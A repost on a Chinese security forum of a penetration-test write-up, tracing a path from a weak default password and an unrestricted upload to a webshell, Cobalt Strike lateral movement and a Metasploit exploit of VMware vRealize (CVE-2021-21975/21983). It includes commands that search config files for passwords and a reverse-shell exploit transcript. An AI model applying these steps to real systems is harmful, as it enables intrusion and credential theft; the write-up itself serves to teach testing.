安全矩阵

 找回密码
 立即注册
搜索
查看: 1773|回复: 0

记一奇葩弱口令到内网实战

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-6-30 00:04:12 | 显示全部楼层 |阅读模式

记一奇葩弱口令到内网实战
原文链接:记一奇葩弱口令到内网实战
原创 菜鸟的菜 [url=]Tide安全团队[/url] 2022-06-29 17:03 发表于山东
编辑
一、前期打点
拿到目标后首先要做的就是信息收集,这次给的目标就给个单位名称,通过互联网上搜索发现其网站在阿里云上着实无奈,在这里推荐个寻找资产的方法,利用ICP/IP地址/域名信息备案管理系统经查询,查询地址如下:

编辑

利用该平台进行查询时需要知道准确的单位名称,可利用该平台查询出已经备案的网站域名,对于只给了单位名称,进行信息收集还是很有效果的。
拿到域名后就会对域名就行子域名扫描了,子域名扫描工具还是很多的,就不在一一展开列举,推线一个在线子域名查找工具,多试试几个子域名扫描工具往往会有意外

编辑

扫到域名通过判断域名解析ip的归属地,可基本判断该域名所在服务器是目标单位自身资产,也就是有突破内网的希望,可值得一试。
通过查看该网站源码发现,其username长度为4,可初步判断,该网站用户名可能是4位数字

编辑

进一步测试发现,该系统还存在账号枚举,于是利用该漏洞,成功枚举出两个账号

编辑

有了账号然后就要进行暴力破解了,加载字典进行破解,发现了一个奇葩的密码
!@#$%%5e%26%2a()
当时看到密码瞬间无语,第一反应就是我的字典还有这密码,这算弱口令么。不管如何总算跑出来了,于是进行登录,发现总是提示密码错误,明明burp已经提示302,为啥浏览器还是提示密码错误呢,在细看密码,猜测可能是被浏览器自动编码了,通过抓包发现,果然编码了,burp抓包替换下就可以了,成功登录系统。那我是不是可以大胆猜测一下,这个账号密码应该是系统默认密码,估计用户可能也没登过。

编辑

登录后台就好说了,找找有没有注入、上传之类的通用漏洞,测试发现有个新建配置信息,发现存在一个上传,没有做任何限制,可轻松上传冰蝎,并且直接返回了路径,瞬间开心。

编辑

编辑

冰蝎连接,发现权限为iis权限,服务器出网,未发现杀毒软件,先翻翻服务器上的文件吧,发现还存在一个tomcat,于是又传了个tomcat马,执行命令发现为system权限,这下连提权都省了,还可以用如下命令找找一些配置文件中的账号密码,往往会有惊喜出现
#linuxfind / -regextype posix-extended -regex ".*\.(properties|xml|cnf|yaml|ini)" | xargs egrep -i "pass|pwd|jdbc#windowsfind /s /i "password" *.properties此处搜索到配置文件中的一些数据库连接账号、密码以及其他的一个网段

编辑

靶机信息收集基本就结束了,接着就是上cs、搭建代理,做内网,利用cs读出服务器账号密码,利用代理远程连接

编辑
二、内网探测
在这次内网中用到了cs的smb进行横向,先简单介绍下smb beacon, SMB Beacon 使用命名管道通过一个父 Beacon 进行通信,这种对等通信对同一台主机上的Beacon 和跨网络的 Beacon 都有效。流量封装于SMB协议中,所以SMB beacon相对隐蔽,可在一定程度上绕过防护设备,smb beacon的具体配置此处不在赘述,具体操作可参考cd的用户手册。

编辑

当内网机器不出网时,可利用SMB Beacon 的主机必须接受445端口上的连接,利用现有主机执行portscan,扫描445端口

编辑

也可用 net view 命令来查找目标所在域的域内目标,在视图表中会显示所有的目标

编辑

可以利用psexec模块登录其他主机

编辑

还可进行Token窃取steal token,然后在利用psexec进行登录

编辑

利用该方法成功探测一个20的ip网段,接着进行内网探测,主要利用fscan进行内网扫描,发现内网存在多台相同密码服务器

编辑

通过登录一台服务器对服务器进行信息收集,在其浏览器上发现网神安全设备

编辑

同样密码登录网神入侵防御系统

编辑

进一步探测发现深信服安全产品

编辑

发现网内存在vcenter,配合CVE-2021-21975以及CVE-2021-21983,可成功获取该服务器权限,主要利用msf获取权限
  1. msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rce
  2. msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts xx.xx.xx.xx.xx
  3. msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost xx.xx.xx.xx
  4. msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run
  5. [*] Started reverse TCP handler on xx..xx.xx.xx:4444
  6. [*] Starting SSRF server...
  7. [*] Using URL: https://0.0.0.0:8443/XtwOOPWn9SJ7[*] Local IP: https://xx.xx.xx.xx:8443/XtwOOPWn9SJ7[*] Executing automatic check (disable AutoCheck to override)
  8. [*] Leaking admin creds via SSRF...
  9. [*] xx.xx.xx.xx:8443/XtwOOPWn9SJ7#
  10. [*] xx.xx.xx.xx connected to SSRF server!
  11. [*] Server stopped.
  12. id
  13. uid8(wheel)
复制代码

编辑

简单介绍该漏洞原理如下:
Reality Smasher”利用 CVE-2021-21975 窃取 vRealize 的“maintenanceAdmin”帐户凭据。这是通过使用此存储库中包含的密钥和证书托管 HTTPS 侦听器来实现的。这些凭据用于所有后续已验证的请求。首先,管理员帐户的散列密码被请求并存储以备后用。
然后使用 CVE-2021-21983 覆盖“admin.properties”文件。接下来请求设置管理员用户的初始密码。这是允许的,因为管理员的凭据存储在“admin.properties”中。如果没有此文件,vRealize 会认为从未设置过凭据并接受未经身份验证的“/security/adminpassword/initial”请求。
重置vcenter密码(在获得用户允许的情况下进行的该操作),可成功登录系统,获取主机控制权限

编辑

查看内网服务器上的配置发现,zabbix配置文件存在xx.xx.60.xx,进而又发现新的网段,发现多个数据库

编辑

编辑

存在数据防泄露系统,可对监测主机进行文件操控

编辑

发现存在部分打印机,可查看打印文件,猜测该段可能是办公内网段

编辑
三、小结
简单总结下,本次的测试内网资产还是比较多的,总共有3个网段,信息收集不管是对于内网还是外网的打点都是很重要的,只有足够仔细才能有意外的收货,翻翻服务器上的主机文件也许就能意外发现其他网段,甚至是密码本之类的文件;还有就是对漏洞的一些验证积累,当然有0day就好,没有0day日常的1day复现也是不错的,平时技巧的积累也会起到关键作用。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 09:48 , Processed in 0.014975 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表